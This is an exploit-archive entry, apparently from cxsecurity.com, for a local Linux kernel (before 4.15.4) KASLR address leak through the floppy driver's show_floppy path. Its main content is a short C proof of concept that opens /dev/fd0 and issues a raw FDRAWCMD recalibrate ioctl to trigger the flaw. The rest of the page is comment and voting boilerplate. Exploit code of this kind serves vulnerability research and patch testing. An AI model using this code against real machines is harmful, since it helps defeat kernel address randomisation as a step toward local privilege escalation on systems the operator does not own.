Linux Kernel < 4.15.4 show_floppy KASLR Address Leak

2018.03.28
Credit: Gregory Draperi
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <linux/kernel.h> #include <string.h> #include <sys/mman.h> #include <linux/fd.h> static int drive_selector(int head) { return (head << 2); } void fd_recalibrate(int fd) { struct floppy_raw_cmd raw_cmd; int tmp; raw_cmd.flags = FD_RAW_INTR; raw_cmd.cmd_count = 2; // set up the command raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07; raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0); tmp = ioctl( fd, FDRAWCMD, &raw_cmd ); printf("Status:%d\n",tmp); } int main(){ printf("Start\n"); char *d; struct floppy_raw_cmd *cmd; int fd; fd = open("/dev/fd0",O_RDWR | O_NDELAY); fd_recalibrate(fd); close(fd); printf("End\n"); return 0; }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top